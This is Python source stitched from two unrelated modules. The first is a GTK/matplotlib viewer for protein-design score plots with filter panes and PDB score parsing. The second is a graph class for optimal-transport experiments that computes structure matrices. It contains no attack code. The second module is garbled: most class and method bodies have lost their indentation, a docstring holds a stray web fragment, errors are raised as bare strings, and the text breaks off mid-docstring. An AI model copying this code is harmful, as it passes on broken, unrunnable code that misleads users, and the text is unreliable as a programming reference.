    selected_designs = [self.designs[key] for key in self.keys]

    chooser = gtk.FileChooserDialog(
            "Save selected funnels",
            parent=self,
            action=gtk.FILE_CHOOSER_ACTION_SAVE,
            buttons=(
                gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,
                gtk.STOCK_SAVE, gtk.RESPONSE_OK))
    chooser.set_current_folder(os.getcwd())
    chooser.set_current_name('selected_funnels.pdf')

    response = chooser.run()

    if response == gtk.RESPONSE_OK:
        pdf = PdfPages(chooser.get_filename())

        # Letter-sized page per design, titled with its directory.
        for index, design in enumerate(selected_designs):
            plt.figure(figsize=(8.5, 11))
            plt.suptitle(design.directory)
            self.plot_models(plt.gca(), [design])
            pdf.savefig()
            plt.close()

        pdf.close()

    chooser.destroy()
def hide_model_list(self):
    self.model_list.hide()
    self.model_list_toggle.set_active(False)
    # Collapse the whole sidebar when both of its panes are hidden.
    if not self.filter_pane.props.visible:
        self.sidebar.hide()

def show_model_list(self):
    self.model_list.show()
    self.model_list_toggle.set_active(True)
    self.sidebar.show()

def toggle_model_list(self):
    if self.model_list.props.visible:
        self.hide_model_list()
    else:
        self.show_model_list()

def hide_filter_pane(self):
    self.filter_pane.hide()
    self.filter_pane_toggle.set_active(False)
    # Collapse the whole sidebar when both of its panes are hidden.
    if not self.model_list.props.visible:
        self.sidebar.hide()

def show_filter_pane(self):
    self.filter_pane.show()
    self.filter_pane_toggle.set_active(True)
    self.sidebar.show()

def toggle_filter_pane(self):
    if self.filter_pane.props.visible:
        self.hide_filter_pane()
    else:
        self.show_filter_pane()

def hide_annotation_pane(self):
    self.annotation_pane.hide()
    self.annotation_pane_toggle.set_active(False)

def show_annotation_pane(self):
    self.annotation_pane.show()
    self.annotation_pane_toggle.set_active(True)

def toggle_annotation_pane(self):
    if self.annotation_pane.props.visible:
        self.hide_annotation_pane()
    else:
        self.show_annotation_pane()

# The legend, representative markers, and model count live inside the
# matplotlib plot, so toggling them means flipping a flag, syncing the
# menu check item, and redrawing the plot.

def hide_legend(self):
    if self.is_legend_visible:
        self.is_legend_visible = False
        self.legend_toggle.set_active(False)
        self.update_plot()

def show_legend(self):
    if not self.is_legend_visible:
        self.is_legend_visible = True
        self.legend_toggle.set_active(True)
        self.update_plot()

def hide_representative(self):
    if self.is_representative_visible:
        self.is_representative_visible = False
        self.representative_toggle.set_active(False)
        self.update_plot()

def show_representative(self):
    if not self.is_representative_visible:
        self.is_representative_visible = True
        self.representative_toggle.set_active(True)
        self.update_plot()

def toggle_legend(self):
    if self.is_legend_visible:
        self.hide_legend()
    else:
        self.show_legend()

def hide_model_count(self):
    if self.is_model_count_visible:
        self.is_model_count_visible = False
        self.model_count_toggle.set_active(False)
        self.update_plot()

def show_model_count(self):
    if not self.is_model_count_visible:
        self.is_model_count_visible = True
        self.model_count_toggle.set_active(True)
        self.update_plot()

def toggle_model_count(self):
    if self.is_model_count_visible:
        self.hide_model_count()
    else:
        self.show_model_count()
def plot_models(self, axes, designs, **kwargs):
    """Draw a violin plot of one metric for the given designs onto *axes*.

    kwargs: 'labels' (accepted but currently unused) and 'x_metric'
    (defaults to the viewer's current x metric).  Relies on module-level
    `pd` (pandas) and `sns` (seaborn) names — presumably imported above
    this chunk; confirm.
    """
    from itertools import count
    labels = kwargs.get('labels', None)
    x_metric = kwargs.get('x_metric', self.x_metric)
    # y_metric = kwargs.get('y_metric', self.y_metric)

    # Define the colors that the plot will use (Tango palette tuples,
    # lighter to darker shades).
    red = '#ef2929', '#cc0000', '#a40000'
    orange = '#fcaf3e', '#f57900', '#ce5c00'
    yellow = '#fce94f', '#edd400', '#c4a000'
    green = '#8ae234', '#73d216', '#4e9a06'
    blue = '#729fcf', '#3465a4', '#204a87'
    purple = '#ad7fa8', '#75507b', '#5c3566'
    brown = '#e9b96e', '#c17d11', '#8f5902'
    grey = '#2e3436', '#555753', '#888a85', '#babdb6', '#d3d7cf', '#eeeeec'

    def color_from_cycle(index):
        # Repeating per-design color cycle.
        cycle = (blue[1], red[1], green[2], orange[1], purple[1], brown[1],
                 blue[0], red[0], green[1], orange[0], purple[0], brown[0])
        return cycle[index % len(cycle)]

    # Clear the axes and reset the axis labels.
    axes.clear()
    axes.set_xlabel(self.metrics[x_metric].title)

    # Concatenate every design's values for the metric into one frame,
    # tagged by design directory, and draw one violin per design.
    all_designs = {}
    if designs:
        for index, design in enumerate(designs):
            this_design = design.get_metric(x_metric).to_frame()
            this_design['name'] = design.directory
            all_designs[design.directory] = this_design
        data = pd.concat(all_designs)
        lines = sns.violinplot(x=data[x_metric], y = data['name'], ax = axes, inner = 'point')

    # Pick the axis limits based on the range of every design.  This is done
    # so you can scroll through every design without the axes changing size.
    def get_metric_limits(metric):
        values = np.concatenate([x.get_metric(metric) for x in self])
        return self.metrics[metric].limits(values)

    x_min, x_max = get_metric_limits(x_metric)
    # y_min, y_max = get_metric_limits(y_metric)

    x_pad = 0.05 * (x_max - x_min)
    # y_pad = 0.05 * (y_max - y_min)

    # axes.set_ylim(
    #         bottom=y_min - y_pad,
    #         top=y_max + y_pad,
    # )
    axes.set_xlim(
            left=x_min - x_pad,
            right=x_max + x_pad,
    )

    # Draw guide lines for axes that have them.
    x_guide = self.metrics[self.x_metric].guide
    # y_guide = self.metrics[self.y_metric].guide
    if x_guide is not None:
        axes.axvline(x_guide, color=grey[3], linestyle='--')
    # if y_guide is not None:
    #     axes.axhline(y_guide, color=grey[3], linestyle='--')

    # Draw the legend if the user enabled it.
    if self.is_legend_visible:
        axes.legend(loc='upper right')

    # Annotate the per-design model counts in the top-left corner.
    if self.is_model_count_visible:
        axes.annotate(
                ', '.join(str(len(x)) for x in designs),
                xy=(0, 1), xycoords='axes fraction',
                xytext=(8, -8), textcoords='offset points',
                verticalalignment='top',
        )
def update_everything(self):
    # Refresh every view component after a bulk state change.
    self.update_annotations()
    self.update_plot()
    self.update_designs()

def update_plot(self):
    # Redraw the plot for the currently selected designs.
    designs = [self.designs[k] for k in self.keys]
    self.plot_models(self.axes, designs, labels=self.keys)
    self.canvas.draw()
def update_annotations(self):
    # The notes editor only works on a single design; disable it (leaving
    # its contents alone) when zero or several designs are selected.
    if len(self.keys) == 1:
        design = self.designs[self.keys[0]]
        self.notes.get_buffer().set_text(design.notes)
        self.notes.set_sensitive(True)
    else:
        self.notes.set_sensitive(False)
def update_designs(self):
    """Repopulate the design list with designs whose notes match the
    search query, then select the first row."""
    model = self.view.get_model()
    selector = self.view.get_selection()
    model.clear()

    def query_matches_design(design):
        # Smart-case search: an all-lowercase query matches
        # case-insensitively; any uppercase makes it case-sensitive.
        needle = self.search_form.get_text()
        haystack = design.notes
        if needle.islower():
            haystack = haystack.lower()
        return needle in haystack

    for key in sorted(self.designs):
        if query_matches_design(self.designs[key]):
            model.append([key])

    selector.select_path((0,))
class FigureCanvas (FigureCanvasGTK3Agg):
    """Matplotlib canvas whose GTK button-press events keep propagating.

    button_press_event returns False so the window-level handler
    (on_click_plot_gtk) also sees the click after matplotlib has.
    """

    def __init__(self, figure):
        FigureCanvasGTK3Agg.__init__(self, figure)

    def button_press_event(self, widget, event):
        FigureCanvasGTK3Agg.button_press_event(self, widget, event)
        return False
class NavigationToolbar (NavigationToolbar2GTK3):
    """Matplotlib toolbar trimmed to a few tools, plus axis-metric menus."""

    # Subset of the stock matplotlib tools (separators commented out).
    toolitems = (
            ('Home', 'Reset original view', 'home', 'home'),
            ('Back', 'Back to previous view', 'back', 'back'),
            ('Forward', 'Forward to next view', 'forward', 'forward'),
            #(None, None, None, None),
            ('Pan', 'Pan axes with left mouse, zoom with right', 'move', 'pan'),
            ('Zoom', 'Zoom to rectangle', 'zoom_to_rect', 'zoom'),
            #(None, None, None, None),
            ('Save', 'Save the figure', 'filesave', 'save_figure'),
    )

    def __init__(self, canvas, parent):
        """*parent* is the viewer window; its setup_metric_menu() supplies
        the x/y drop-downs, kept on self so hotkeys can drive them."""
        NavigationToolbar2GTK3.__init__(self, canvas, parent)

        self.x_axis_menu = parent.setup_metric_menu(
                parent.on_change_x_metric, parent.x_metric)
        self.y_axis_menu = parent.setup_metric_menu(
                parent.on_change_y_metric, parent.y_metric)

        # Lay out "<y menu> vs. <x menu>" at the end of the toolbar.
        table = gtk.Table(3, 4)
        table.attach(gtk.SeparatorToolItem(), 0, 1, 0, 3)
        table.attach(self.y_axis_menu, 1, 2, 1, 2, xoptions=0, yoptions=0)
        table.attach(gtk.Label(' vs. '), 2, 3, 1, 2, xoptions=0, yoptions=0)
        table.attach(self.x_axis_menu, 3, 4, 1, 2, xoptions=0, yoptions=0)

        tool_item = gtk.ToolItem()
        tool_item.add(table)
        self.insert(tool_item, len(self.toolitems))

    def set_message(self, message):
        # Suppress matplotlib's coordinate readout; the viewer shows its
        # own in a dedicated label (see setup_plot / on_move_mouse_mpl).
        pass
class FilterPane(gtk.Table):
    """A table of user-defined metric filters (e.g. "total_score < -100").

    Emits the 'updated' signal whenever a filter or the action menu
    changes, so the owning viewer can redraw its plot.
    """

    __gsignals__ = {
            'updated' : (
                gobject.SIGNAL_RUN_LAST,
                gobject.TYPE_NONE,
                (),
            )
    }

    def __init__(self, master):
        gtk.Table.__init__(self)
        self.master = master          # the owning viewer window
        self.filters = []             # list of FilterPane.Filter rows
        self.action_menu = self.make_action_menu()
        self.add_button = self.make_add_button()
        self.update_num_rows()

    def get_action(self):
        """Return the selected action, 'highlight' or 'hide'."""
        return self.action_menu.get_active_text().lower()

    def get_masks(self, design):
        """Return (keep, drop) boolean masks over the models in *design*.

        A model is kept when it satisfies every filter.  Filters with a
        non-numeric threshold or an unrecognized operator are skipped.
        """
        keep = np.ones(len(design), dtype='bool')

        for filter in self.filters:
            name = filter.get_name()
            op = filter.get_operator()
            try: threshold = float(filter.get_threshold())
            except (TypeError, ValueError): continue
            metric = design.get_metric(name)

            if op == '>': result = metric > threshold
            elif op == '<': result = metric < threshold
            elif op == '>=': result = metric >= threshold
            elif op == '<=': result = metric <= threshold
            # Accept both spellings: make_operator_menu() historically
            # offered '=' while this method only understood '==', which
            # left `result` unbound and crashed (or silently reused the
            # previous filter's mask).
            elif op in ('=', '=='): result = metric == threshold
            elif op == '!=': result = metric != threshold
            else: continue

            filter.update_counter(sum(result), len(result))
            keep &= result

        return keep, np.logical_not(keep)

    def make_add_button(self):
        """Return a left-aligned '+' button that appends a new filter row."""
        button = make_stock_button(gtk.STOCK_ADD)
        button.connect('clicked', lambda _: self.add_filter())
        align = gtk.Alignment(0.0, 0.5)
        align.add(button)
        return align

    def make_action_menu(self):
        """Return the Highlight/Hide combo box."""
        combo_box = gtk.ComboBoxText()
        combo_box.append_text("Highlight")
        combo_box.append_text("Hide")
        combo_box.set_active(0)
        combo_box.connect('changed', lambda _: self.emit('updated'))
        return combo_box

    def add_filter(self):
        filter = self.Filter(self)
        self.filters.append(filter)
        self.update_num_rows()

    def remove_filter(self, filter):
        self.filters.remove(filter)
        self.update_num_rows()

    def update_num_rows(self):
        """Rebuild the table layout after a filter is added or removed."""
        # gtk.Table can't re-flow rows, so remove everything and re-attach.
        for child in self.get_children():
            self.remove(child)

        action_label = gtk.Label("Action:")
        action_label.set_alignment(0.0, 0.5)
        filter_label = gtk.Label("Filters:")
        filter_label.set_alignment(0.0, 0.5)

        # At least two rows: the action row and the add-button row.
        rows = max(len(self.filters) + 2, 2)
        self.resize(rows, 6)

        fill = dict(xoptions=gtk.FILL, yoptions=gtk.FILL)
        self.attach(action_label, 0, 1, 0, 1, **fill)
        self.attach(self.action_menu, 1, 2, 0, 1, **fill)
        self.attach(filter_label, 0, 1, 1, 2, **fill)

        i = 0
        for filter in self.filters:
            filter.attach(i+1, **fill)
            i += 1
        self.attach(self.add_button, 1, 2, i+1, i+2, **fill)

        self.emit('updated')
        self.show_all()

    class Filter(object):
        """One filter row: metric menu, operator menu, threshold, delete."""

        def __init__(self, table):
            self.table = table
            self.filter_menu = table.master.setup_metric_menu()
            self.operator_menu = make_operator_menu()
            self.threshold_entry = gtk.Entry()
            self.threshold_entry.set_width_chars(5)
            self.delete_button = make_stock_button(gtk.STOCK_CANCEL)
            self.counter = gtk.Label()   # shows "kept/total" after filtering

            self.filter_menu.connect('changed', lambda _: table.emit('updated'))
            self.operator_menu.connect('changed', lambda _: table.emit('updated'))
            self.threshold_entry.connect('activate', lambda _: table.emit('updated'))
            self.delete_button.connect('clicked', lambda _: table.remove_filter(self))

        def __repr__(self):
            return '<Filter "{} {} {}">'.format(
                    self.filter_menu.get_active_text(),
                    self.operator_menu.get_active_text(),
                    self.threshold_entry.get_text() or '???')

        def get_name(self):
            return self.filter_menu.get_active_text()

        def get_operator(self):
            return self.operator_menu.get_active_text()

        def get_threshold(self):
            return self.threshold_entry.get_text()

        def attach(self, i, **fill):
            # Attach this row's widgets to table row *i*.
            self.table.attach(self.filter_menu, 1, 2, i, i+1, **fill)
            self.table.attach(self.operator_menu, 2, 3, i, i+1, **fill)
            self.table.attach(self.threshold_entry, 3, 4, i, i+1, **fill)
            self.table.attach(self.delete_button, 4, 5, i, i+1, **fill)
            self.table.attach(self.counter, 5, 6, i, i+1, **fill)

        def update_counter(self, num_kept, num_total):
            self.counter.set_text('{}/{}'.format(num_kept, num_total))
class MetricInfo(object):
    """Plain record describing how one score metric is displayed."""

    def __init__(self, name, title, order, guide, limits):
        self.name = name        # internal metric key
        self.title = title      # human-readable axis label
        self.order = order      # preferred sort order, or None
        self.guide = guide      # guide-line position, or None
        self.limits = limits    # callable: values -> (lower, upper)

    def __repr__(self):
        return '<MetricInfo name="{0}">'.format(self.name)
def make_stock_button(stock):
    """Return a small button showing the given GTK stock icon."""
    image = gtk.Image()
    image.set_from_stock(stock, gtk.IconSize.BUTTON)
    button = gtk.Button()
    button.add(image)
    return button
def make_operator_menu():
    """Return a combo box listing comparison operators for filter rows.

    Uses '==' (not '=') so the selected text matches the operators that
    FilterPane.get_masks() actually checks for; '=' previously produced a
    filter that was never applied.
    """
    combo_box = gtk.ComboBoxText()
    options = '<', '>', '<=', '>=', '==', '!='
    for option in options:
        combo_box.append_text(option)
    combo_box.set_active(0)
    return combo_box
default_x_metric = 'restraint_dist'
default_y_metric = 'total_score'

# Pretty axis titles for metrics whose auto-generated title would be wrong.
metric_titles = {
    'total_score': 'Total Score (REU)',
    'loop_rmsd': 'Loop RMSD (Å)',
    'delta_buried_unsats': 'Δ Buried Unsats',
}
# Preferred sort orders (none defined yet).
metric_orders = {
}
# Positions of dashed guide lines drawn across the plot.
metric_guides = {
    'loop_rmsd': 1.0,
}
# Axis-limit policies; metrics not listed here use the full (min, max).
metric_limits = {
    'total_score': lambda x: (
        min(x),
        np.percentile(x, 85)),
    'loop_rmsd': lambda x: (
        0.025 * max(x),
        max(x)),
}

def get_metric_title(metric, design=None):
    """Return a human-readable title for *metric* (fallback: title-cased name)."""
    fallback = metric.replace('_', ' ').title()
    return metric_titles.get(metric, fallback)

def get_metric_order(metric, design=None):
    """Return the preferred sort order for *metric*, or None."""
    return metric_orders.get(metric)

def get_metric_guide(metric, design=None):
    """Return the guide-line position for *metric*, or None."""
    return metric_guides.get(metric)

def get_metric_limits(metric, design=None):
    """Return a callable mapping a value sequence to (lower, upper) limits."""
    return metric_limits.get(metric, lambda x: (min(x), max(x)))
def show_my_designs(directories, use_cache=True, launch_gui=True,
        fork_gui=True, normalize_to_all=True):
    """Load designs from *directories* and launch the main GUI.

    use_cache: reuse cached metrics when available.
    launch_gui: set False to only load the designs (e.g. refresh caches).
    fork_gui: run the GUI in a forked background process when possible.
    normalize_to_all: passed through to ShowMyDesigns.
    """
    try:
        designs = load_designs(directories, use_cache=use_cache)

        if designs and launch_gui:
            # If the user wants to run in a background process, try to fork.
            # But for some reason fork() doesn't seem to work on Macs, so just
            # run the GUI in the main process if anything goes wrong.
            try:
                if fork_gui and os.fork():
                    sys.exit()
            except Exception:
                pass

            gui = ShowMyDesigns(designs,
                    normalize_to_all=normalize_to_all)
            gtk.main()

    except KeyboardInterrupt:
        # Ctrl-C: exit quietly with a clean newline instead of a traceback.
        print()
def show_my_violins(directories, use_cache=True, launch_gui=True, fork_gui=True):
    """Load designs from *directories* and launch the violin-plot GUI.

    Parameters mirror show_my_designs().  (A leftover debug
    `print("designs", designs)` was removed.)
    """
    try:
        designs = load_designs(directories, use_cache=use_cache)

        if designs and launch_gui:
            # If the user wants to run in a background process, try to fork.
            # But for some reason fork() doesn't seem to work on Macs, so just
            # run the GUI in the main process if anything goes wrong.
            try:
                if fork_gui and os.fork():
                    sys.exit()
            except Exception:
                pass

            gui = ShowMyViolins(designs)
            gtk.main()

    except KeyboardInterrupt:
        # Ctrl-C: exit quietly with a clean newline instead of a traceback.
        print()
def load_designs(directories, use_cache=True):
    """Construct a Design for each directory, in order, skipping bad ones.

    An IOError carrying a message is treated as an expected "can't load
    this design" condition: it is reported and the directory is skipped.
    An IOError with no message is unexpected and is re-raised.
    """
    designs = collections.OrderedDict()

    for directory in directories:
        try:
            designs[directory] = Design(directory, use_cache)
        except IOError as error:
            if not str(error):
                raise
            print("Error:", str(error))

    return designs
def parse_records_from_pdbs(pdb_paths):
    """Read one score record per PDB file (plain or gzipped).

    Progress is echoed to stdout because this is often slow.  Unreadable
    files are reported and skipped.  Returns a list of dicts, each with
    at least a 'path' key plus whatever parse_record_from_pdb() extracts.
    """
    records = []

    for i, path in enumerate(pdb_paths):
        # Update the user on our progress, because this is often slow.
        sys.stdout.write("\rReading '{}' [{}/{}]".format(
            os.path.dirname(path), i+1, len(pdb_paths)))
        sys.stdout.flush()

        # Read the PDB file, which may be gzipped.
        try:
            def smart_open(path):
                # 'rt' so gzipped files yield str lines like open() does;
                # the binary default would break str.startswith() parsing
                # downstream in parse_record_from_pdb().
                if path.endswith('.gz'): return gzip.open(path, 'rt')
                else: return open(path)

            with smart_open(path) as file:
                lines = file.readlines()
        except IOError:
            print("\nFailed to read '{}'".format(path))
            continue

        # Parse the pdb file.  This method may be overloaded to parse
        # different kinds of information.
        record = {'path': os.path.basename(path)}
        parse_record_from_pdb(record, path, lines)
        records.append(record)

    if pdb_paths: print()
    return records
def parse_record_from_pdb(record, pdb_path, lines):
    """Populate *record* in place with metrics scraped from PDB text lines.

    Recognized line prefixes (some are specific to certain simulations):
    'total_score' and 'pose' both set record['total_score'] (a later
    'pose' line overrides), 'loop_backbone_rmsd' sets record['loop_rmsd'],
    and 'delta_buried_unsats' sets record['delta_buried_unsats'].
    """
    for line in lines:
        fields = line.split()
        if line.startswith('total_score'):
            record['total_score'] = float(fields[1])
        if line.startswith('pose'):
            record['total_score'] = float(fields[-1])
        if line.startswith('loop_backbone_rmsd'):
            record['loop_rmsd'] = float(fields[1])
        if line.startswith('delta_buried_unsats'):
            record['delta_buried_unsats'] = float(fields[1])
def try_to_run_command(command):
    """Launch *command* detached, stdout discarded; pop up an error
    dialog if the executable can't be started."""
    print(command)
    with open(os.devnull, 'w') as devnull:
        try: subprocess.Popen(command, stdout=devnull)
        except OSError as error:
            message = gtk.MessageDialog(
                    parent=None,
                    flags=0,
                    type=gtk.MESSAGE_ERROR,
                    buttons=gtk.BUTTONS_OK,
            )
            message.set_markup("<b>Failed to run {}</b>".format(command[0]))
            message.format_secondary_text(str(error))
            message.run()
            message.destroy()
def main():
    """Command-line entry point: parse docopt args and launch the GUI."""
    import docopt
    args = docopt.docopt(__doc__)

    if args['--version']:
        from show_my_designs import __version__
        print('{0} {1} (python {2[0]}.{2[1]})'.format(
                os.path.basename(sys.argv[0]), __version__, sys.version_info))
        raise SystemExit

    show_my_designs(
            args['<pdb_directories>'],
            use_cache=not args['--force'],
            launch_gui=not args['--quiet'],
            fork_gui=not args['--no-fork'],
    )
# ---- (file-concatenation artifact: a stray '|' that separated two modules was replaced with this comment so the file parses) ----
import networkx as nx
import matplotlib.pyplot as plt
import numpy as np
import ot
import time
from scipy.sparse.csgraph import shortest_path
from scipy import sparse
import copy
import matplotlib.colors as mcol
from matplotlib import cm
class NoAttrMatrix(Exception):
    # Presumably raised when a graph has no node-attribute matrix to work
    # with — no raise sites are visible in this chunk; confirm.
    pass

class NoPathException(Exception):
    # Presumably raised when no path exists between two nodes — no raise
    # sites are visible in this chunk; confirm.
    pass
"""
Summarizes all the methods and classes related to graphs
"""
#%%
class Graph():
""" Graph is a class that model all the graphs used in the experiments.
Attributes
----------
nx_graph : a networkx graph, optionnal
The networkx graph
C : ndarray
The structure matrix of the graph. Initalize at None
name_struct_dist : string
The name of the method used to compute the structure matrix
name : string,
Name of the graph because life without name has no meaning.
"""
def __init__(self,nx_graph=None):
    """Wrap a copy of *nx_graph*, or start with an empty networkx graph."""
    if nx_graph is not None:
        self.nx_graph=nx.Graph(nx_graph)
    else:
        self.nx_graph=nx.Graph()
    # Placeholder name; characterized() treats this exact string as
    # "unnamed", so it must not be changed.
    self.name='A graph as no name'
    # Timing/distance logs, filled in by the distance computations.
    self.log={}
    self.log['pertoperdistance']=[]
    self.log['pathtime']=[]
    self.log['attridist']=[]
    # Structure matrix, computed lazily by distance_matrix().
    self.C=None
    self.name_struct_dist='No struct name for now'
def __eq__(self, other) :
    # Two Graphs compare equal when their wrapped networkx graphs do.
    # NOTE(review): confirm nx.Graph equality means what callers expect
    # here — it may be identity comparison depending on the nx version.
    return self.nx_graph == other.nx_graph

def __hash__(self):
    # NOTE(review): str(self) falls back to the default object repr
    # (which includes the instance id), so graphs that compare equal can
    # hash differently — this breaks the __eq__/__hash__ contract for
    # dict/set membership.  Flagged, not changed, since fixing it would
    # alter dedup behavior for existing callers.
    return hash(str(self))
def characterized(self):
    """Return the graph's name if one was assigned, else the graph itself.

    The sentinel string is the placeholder set by __init__ for unnamed
    graphs.
    """
    is_named = self.name != 'A graph as no name'
    return self.name if is_named else self
def nodes(self):
    """Return the vertices of the graph as a dict (node -> attribute dict)."""
    return dict(self.nx_graph.nodes())

def edges(self):
    """Return the edges of the graph (a networkx edge view)."""
    return self.nx_graph.edges()
def add_vertex(self, vertex):
    """Add *vertex* to the graph unless it is already a node."""
    existing = self.nodes()
    if vertex in existing:
        return
    self.nx_graph.add_node(vertex)
def values(self):
    """Return the 'attr_name' feature of every node, as a list."""
    attributes = nx.get_node_attributes(self.nx_graph, 'attr_name')
    return list(attributes.values())
def add_nodes(self, nodes):
self.nx_graph.add_nodes_from(nodes)
def add_edge(self, edge):
""" assumes that edge is of type set, tuple orscipy.sparse.csgraph.laplacian¶ list;
between two vertices can be multiple edges!
"""
(vertex1, vertex2) = tuple(edge)
self.nx_graph.add_edge(vertex1,vertex2)
def add_one_attribute(self,node,attr,attr_name='attr_name'):
self.nx_graph.add_node(node,attr_name=attr)
def add_attibutes(self,attributes):
attributes=dict(attributes)
for node,attr in attributes.items():
self.add_one_attribute(node,attr)
def get_attr(self,vertex):
return self.nx_graph.node[vertex]
def reshaper(self,x):
try:
a=x.shape[1]
return x
except IndexError:
return x.reshape(-1,1)
def distance_matrix(self,method='shortest_path',changeInf=True,maxvaluemulti=10,force_recompute=True):
""" Compute the structure matrix of the graph.
It aims at comparing nodes between them using a notion of similarity defined by the "method" parameter
Parameters
----------
method : string, default shortest_path. choices : shortest_path, square_shortest_path, weighted_shortest_path, adjency, harmonic_distance
The method used to compute the structure matrix of the graph :
- shortest_path : compute all the shortest_path between the nodes
- square_shortest_path : same but squared
- weighted_shortest_path : compute the shortest path of the weighted graph with weights the distances between the features of the nodes
- adjency : compute the adjency matrix of the graph
- harmonic_distance : harmonic distance between the nodes
changeInf : bool
If true when the graph has disconnected parts it replaces inf distances by a maxvaluemulti times the largest value of the structure matrix
force_recompute : force to recompute de distance matrix. If False the matrix is computed only if not already compute or if the method used for computing it changes
Returns
-------
C : ndarray, shape (n_nodes,n_nodes)
The structure matrix of the graph
Set also the attribute C of the graph if C does not exist or if force_recompute is True
"""
start=time.time()
if (self.C is None) or force_recompute:
A=nx.adjacency_matrix(self.nx_graph)
if method=='harmonic_distance':
A=A.astype(np.float32)
D=np.sum(A,axis=0)
L=np.diag(D)-A
ones_vector=np.ones(L.shape[0])
fL=np.linalg.pinv(L)
C=np.outer(np.diag(fL),ones_vector)+np.outer(ones_vector,np.diag(fL))-2*fL
C=np.array(C)
elif method=='shortest_path':
C=shortest_path(A)
elif method=='square_shortest_path':
C=shortest_path(A)
C=C**2
elif method=='adjacency':
return A.toarray()
elif method=='augmented_adjacency':
# Add self loops
C = A + np.diag(np.ones(A.shape[0]))
elif method=='normalized_adjacency':
A_ = A.toarray()
deg = np.sum(A_,axis=0)
if 0 in deg:
raise 'isolated node in graph'
else:
D_invsquared = np.diag(1/np.sqrt(deg))
C=D_invsquared.dot(A_).dot(D_invsquared)
elif method=='weighted_shortest_path':
d=self.reshaper(np.array([v for (k,v) in nx.get_node_attributes(self.nx_graph,'attr_name').items()]))
D= ot.dist(d,d)
D_sparse=sparse.csr_matrix(D)
C=shortest_path(A.multiply(D_sparse))
elif method =='laplacian':
A_ = A.toarray()
deg = np.sum(A_,axis=0)
C = np.diag(deg)-A_
elif method =='normalized_laplacian':
A_ = A.toarray()
deg = np.sum(A_,axis=0)
if 0 in deg:
raise 'isolated node in graph'
else:
D_invsquared = np.diag(1/np.sqrt(deg))
M=D_invsquared.dot(A_).dot(D_invsquared)
C= np.eye(A_.shape[0]) - M
elif method =='signed_laplacian':
A_ = A.toarray()
deg = np.sum(A_,axis=0)
C= np.diag(deg)+A_
elif method =='normalized_signed_laplacian':
A_ = A.toarray()
deg = np.sum(A_,axis=0)
if 0 in deg:
raise 'isolated node in graph'
else:
D_invsquared = np.diag(1/np.sqrt(deg))
M=D_invsquared.dot(A_).dot(D_invsquared)
C= np.eye(A_.shape[0]) + M
elif method[0]=='heat_normalized_laplacian':
#compute normalized laplacian
A_ = A.toarray()
deg = np.sum(A_,axis=0)
if 0 in deg:
raise 'isolated node in graph'
else:
D_invsquared = np.diag(1/np.sqrt(deg))
M=D_invsquared.dot(A_).dot(D_invsquared)
norm_L = np.eye(A_.shape[0]) - M
lam, phi = np.linalg.eigh(norm_L)
C= np.matmul(phi,np.matmul(np.diag(np.exp(-method[1]*lam)),phi.T))
elif method[0]=='heat_laplacian':
#compute normalized laplacian
A_ = A.toarray()
deg = np.sum(A_,axis=0)
L= deg -A
lam, phi = np.linalg.eigh(L)
C= np.matmul(phi,np.matmul(np.diag(np.exp(-method[1]*lam)),phi.T))
else:
raise 'UNKNOWN METHOD'
if changeInf==True:
C[C==float('inf')]=maxvaluemulti*np.max(C[C!=float('inf')]) # à voir
self.C=C
self.name_struct_dist=method
end=time.time()
self.log['allStructTime']=(end-start)
return self.C
else :
end=time.time()
self.log['allStructTime']=(end-start)
return self.C
def all_matrix_attr(self,return_invd=False):
d=dict((k, v) for k, v in self.nx_graph.node.items())
x=[]
invd={}
try :
j=0
for k,v in d.items():
x.append(v['attr_name'])
invd[k]=j
j=j+1
if return_invd:
return np.array(x),invd
else:
return np.array(x)
except KeyError:
raise NoAttrMatrix
#%%
def find_thresh(C, inf=0.5, sup=3, step=10):
    """Line-search for the best threshold turning a structure matrix into an
    adjacency matrix.

    ``step`` candidate thresholds are tried between ``inf`` and ``sup``; the
    winner minimizes the reconstruction error between ``C`` and the
    shortest-path matrix of the thresholded adjacency matrix.

    Parameters
    ----------
    C : ndarray, shape (n_nodes, n_nodes)
        The structure matrix to threshold.
    inf : float
        The beginning of the linesearch.
    sup : float
        The end of the linesearch.
    step : integer
        Number of thresholds tested.

    Returns
    -------
    tuple
        (best threshold, list of reconstruction errors per candidate).
    """
    candidates = np.linspace(inf, sup, step)
    errors = []
    for candidate in candidates:
        adjacency = sp_to_adjency(C, 0, candidate)
        sp = shortest_path(adjacency, method='D')
        # Disconnected pairs get a fixed large distance instead of inf.
        sp[sp == float('inf')] = 100
        errors.append(np.linalg.norm(sp - C))
    return candidates[np.argmin(errors)], errors
def sp_to_adjency(C, threshinf=0.2, threshsup=1.8):
    """Threshold a structure matrix into a binary adjacency matrix.

    The diagonal is first zeroed, every entry is clipped into
    [threshinf, threshsup], entries saturating at threshsup are treated as
    "not connected" and dropped, and every remaining non-zero entry is set
    to 1.

    Parameters
    ----------
    C : ndarray, shape (n_nodes, n_nodes)
        The structure matrix to threshold.
    threshinf : float
        The minimum value of distance from which the new value is set to 1.
    threshsup : float
        The maximum value of distance from which the new value is set to 1.

    Returns
    -------
    ndarray, shape (n_nodes, n_nodes)
        The thresholded matrix. Each element is in {0, 1}.
    """
    diag_part = np.zeros_like(C)
    np.fill_diagonal(diag_part, np.diagonal(C))
    clipped = np.clip(C - diag_part, threshinf, threshsup)
    clipped[clipped == threshsup] = 0
    clipped[clipped != 0] = 1
    return clipped
def relabel_graph_order(graph):
    """Relabel the nodes of ``graph`` with consecutive integers 0..n-1.

    Parameters
    ----------
    graph : networkx graph

    Returns
    -------
    graph_relabel : networkx graph
        Copy of ``graph`` whose nodes are renamed to their position index.
    inv_relabel_dict_ : dict
        Maps each integer label back to the original node name.
    """
    # The original incremented the loop variable by hand (`i += 1`) inside a
    # `for i in range(...)` loop — dead code; enumerate states the intent.
    relabel_dict_ = {node: i for i, node in enumerate(graph.nodes())}
    inv_relabel_dict_ = {v: k for k, v in relabel_dict_.items()}
    graph_relabel = nx.relabel_nodes(graph, relabel_dict_)
    return graph_relabel, inv_relabel_dict_
def wl_labeling(graph,h=2,tohash=True):
    """ Computes the Weisfeler-Lehman labeling for all nodes
    Parameters
    ----------
    graph : Graph
        The Graph to relabel
    h : integer
        The number of iteration of the Weisfeler-Lehman coloring. See [4]
    tohash : bool, optionnal
        Wether to hash the concatenated labeled
    Returns
    -------
    graphs : Graph,
        The relabeled graph
    References
    ----------
    .. [4] <NAME> and Pierre{-}<NAME> and <NAME>
        "On Valid Optimal Assignment Kernels and Applications to Graph Classification"
